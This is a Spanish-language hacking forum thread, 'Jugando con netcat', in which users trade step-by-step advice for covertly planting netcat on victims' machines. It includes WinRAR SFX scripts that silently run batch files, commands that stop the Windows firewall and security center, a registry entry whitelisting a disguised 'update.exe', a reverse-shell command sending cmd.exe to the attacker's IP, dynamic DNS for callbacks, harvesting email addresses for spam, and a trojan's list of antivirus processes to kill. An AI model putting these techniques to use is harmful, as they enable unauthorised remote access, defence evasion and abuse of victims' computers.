 Autor
|
Tema: Jugando con netcat (Leído 54755 veces)
|
marlon_agz
 Desconectado
Mensajes: 784
Encontre el origen de los Emos xD
|
my friend  hice todo a la perfeccion (creo)xD y me dice que no es una aplicacion win32 valida :S ya lo intente desde cero 3 veces y sigue el mismo error :S y donde ingreso estos comandos? :S net stop "Centro de seguridad" net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" Supongo que esto es un bat, lo comprimo junto con el netcat con winrar y lo pongo en comentario ? reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /f Salu2 |
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Mmm...Cuando creas un SFX en WinRar el comentario no se toca ya que tiene el script SFX para la descompresión. Lo de net stop son comandos para la consola, los pones en un bat. Para hacer todo junto podes crear el sfx (yo los creo siempre en formato zip que me parece mas simple), vas a la solapa de avanzadas > opciones del SFX, configuras todo a gusto y pones aceptar...ahora en la solapa comment te tendría que aparecer algo como. ;The comment below contains SFX script commands
Path=TOK
Setup=TOK.bat
Overwrite=1
Title=Instalar
Text
{
Seleccione la carpeta desde la que se ejecutara Trash Over Killer
}
Shortcut=P, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"
Shortcut=D, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"
Ese es para un antiWorm que estoy desarrollando. Fijate que crea dos shortcuts, tiene un texto y lo de Setup=TOK.bat es la parte que va a ejecutar el TOK.bat cuando se termine la descompresion. Si en la parte de modos usas el modo silencioso no tiene dialogo asi que vas a ver que ese TOK.bat (eso para mi caso) se ejecuta solito, ya que la descompresion se hizo sin decir nada... Podes desde el mismo bat hacer todo junto...pero en general a mi me gusta mandar tambien NirCmd en el paquete y usar dos bats, uno llama al otro con nircmd execmd que es una orden para ejecutar lo que le pedimos sin mostrar nada. Hay una forma de hacerlo sin Nir (en cmd), pero no me la acuerdo...  Bueno, lo que obtenes mandando el paquete con nir, nc y esos dos bats es la posibilidad de que el segundo bat se ejecute sin mostrar nada de nada...asi que podes hacer cositas que lleven tiempo y el usuario no podra notarlo, a menos que hagas cosas que requieran trabajo, en ese caso el usuario puede notar que su pc esta haciendo algo. Pero si logras meter NetCat haces un scan de las direcciones de E-Mail, las mandas a un txt y despues usas ese txt desde netcat para enviar correos, o lo que quieras!!! Es mucho lo que se puede hacer si lograste meter todo, y si el bat se ejecuta en silencio significa que le podes escanear practicamente toda la maquina, ya que eso no hace mucho alarde...jeje |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
A ver, mejor me explico porque lo lei y no se entiende nada... Uno de los bats (pongamosle run.bat) tiene que decir: echo off
color FE
nircmd execmd runme.bat
exit Obviamente vas a tener otro llamado runme.bat que metera netcat, y hara todo el lio sin mostrar nada. Tambien deberas incluir en ese caso el nircmd. Yo lo suelo renombrar como algo mas creativo como nir o com...jeje En ese caso el comando debe ser nir execmd runme.bat o com execmd runme.bat. El otro tendra algo como net stop sharedaccess
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
...
Y blablabla todos los que quieras...total el usuario no lo ve. |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 799
+-=[Yan]=-+
|
No es necesario crear archivos bats si puedes crear multiejecuciones en SFX Path=TOK
Setup=cmd /c net stop sharedaccess&&net stop sharedaccess&&net stop "Centro de Seguridad"&&net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"&&net stop "Windows Firewall/Internet Connection Sharing (ICS)"O Path=%windir%
Setup=net stop sharedaccess
Setup=net stop sharedaccess&&net stop "Centro de Seguridad"
Setup=net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
Setup=net stop "Windows Firewall/Internet Connection Sharing (ICS)"etc etc... De todas maneras hace un poco de tiempo hice un programa para ejecutar bats sin que se vea la consola de comandos. http://512.iespana.es/ncBusca el programa llamado bgr.rar y descomprimelo... luego escribe en el texto llamado ejecutar.txt el nombre y la ruta del bat y lixto, ahora solo ejecutas el ejecute_invisible.exe |
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Bueno si vamos al caso tambien podemos hacer un vbs pero me parecio que trabajar con lo de siempre es mas comodo...me sale el vago de adentro. Por cierto, intente mandar un mail desde nc con lo de type mjeberreta.txt|nc -vv -w 10 mail.speedy.com.ar 25...el tema es que me saca un error. Use como smtp el mail.speedy.com.ar que es el que mi viejo usa en el outlook como correo de salida. No se porque me pone estos errores: 220 galga.terra.com ESMTP 503 <Anonimo>: Helo command rejected: Improper use of SMTP command pipelining 503 Error: send HELO/EHLO first 503 Error: need MAIL command 503 Error: need RCPT command 221 Error: I can break rules, too. Goodbye. no cazo porque??? |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 799
+-=[Yan]=-+
|
Escribe tu mjeberreta.txt, además no puedes enviar correos anonimamente o sin usar una contraseña en servidores como timonfonika, hotmail, yahoo, etc etc... por eso utilizé el miniremailer como servidor SMTP... ahora puedes usar un miniremailer para consola si quieres enviarlos directamente desde una makina remota  Usa el miniremailer directamente desde http://512.iespana.es/ncNota: en un tiempo mas cambiaré los links directamente para que no sigan diciendo que mi post es SPAM para promocionar mi web ya que ni si quiera está terminada como para querer generar visitas . |
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Grax...me imagine que seria por algo de eso, y por tu pag, el reshack no lo puedo descargar...y no te hagas problema porque no este terminada, iespana tiene esa forma fea de publicar subiendo los ficheros desde la PC...¬¬...me gustaba mas la forma que ofrece zerocatch de modificar los documentos html manualmente desde el mismo servidor. Yo tengo estancado un link en mi web, ya que saque una nueva herramientita para limpiarse de algunas infecciones, y todavia no la reemplace, deje el link ahi nomas...jeje Por cierto, leí por ahi que estabas compilando una nueva de netcat...  se me ocurre compilar un servernc.exe como servidor y un clientnc.exe como cliente...ahora me estoy fijando como llegar a hacerlo, pero no ando con mucho tiempo. Probablemente me fije como mejorar las características de servidor de nc... Bueno, gracias por la rta XDXD see you later man! |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
marlon_agz
Desconectado
Mensajes: 784
Encontre el origen de los Emos xD
|
my frien respondo para que sepas que aun sigo intentandolo xD aunque me sigue mandando aplicacion win32 no valida  bueno seguire buscandole salu2 |
|
|
|
|
En línea
|
|
|
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
A ver, otra vez yo...estuve probandocon el minirelay y logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa. No puede ser que esté baneado por bomber ni nada de eso, hice ping y responde, pero me sigue rebotando los Mails.
Y otra cosa. Uso speedy y me brinda una IP dinámica. Si quiero hacer que una Máquina remota se conecte a mi PC cada tanto, yo escribo:
nc -d -e cmd.exe miip 3000
cosa que crearía una inversa por el puerto 3000, el problema es que mi IP cambia cada vez que me conecto ¿Es lo mismo si uso el nombre de mi equipo? (Pregunto como para no ponerme a probar...XD)
|
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 799
+-=[Yan]=-+
|
mi IP cambia cada vez que me conecto Puedes crear una cuenta No-Ip la cual te asigna un nombre llamado DNS por ejemplo el mio: bogamory.sytes.net el cual al encender la pc automaticamente mi IP pasa a ser ese nombre. http://www.no-ip.com/services/managed_dns/free_dynamic_dns.htmllogré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa Hotmail ya no acepta correos de cualquier IP como antes lo hacia. |
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Grax...se agradece!!! |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Hola, de nuevo yo. Estuve probando, y logré obtener la shell de un amigo, aunque casi enseguida se corto la conexion por el firewall que el usaba. Mi pregunta es: Si tengo varias máquinas intentando conectarse a la mía, cómo puedo hacer?
Leí que renombraban el nc en la máquina de la víctima pero en ese caso tendría que renombrarlo tamb en la mía no?
Quisiera que me aclaren ese tema, nada mas, grax...
|
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
Dark_Knight
Desconectado
Mensajes: 98
|
hola alguien sabe como puedo hacer netcat indectectable a los antivirus... o alguien cnoce alguna lista de procesos de antivirus para eliminarlos a la hora de instala netcat espero su respuesta gracias |
|
|
|
|
En línea
|
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
|
|
|
D4RIO
Desconectado
Mensajes: 403
"ser el mejor no es suficiente" - slackbyte
|
Una lista de procesos: APVDWIN.exe Avp32.exe avpcc.exe AVWUpSrv cmd.exe command.com iamapp.exe kavsvc navpw32.exe NOD32krn NOD32KRN.exe NOD32KUI.exe NPFMntor outpostfirewall PAVSRV51.exe PccPfw.exe PTstartmon.exe SNDSrvc TroyanFindInfo.exe VSMON.exe WEBPROXY.exe ZAPRO.exe Es la que usa el troyano LD-Pinch, pero no te servirá de mucho porque son procesos que no se dejan detener así como así, o sea, no es tan simple, necesitas investigar cómo detener a un cierto proceso y evitar que se reinicie |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
|
 |
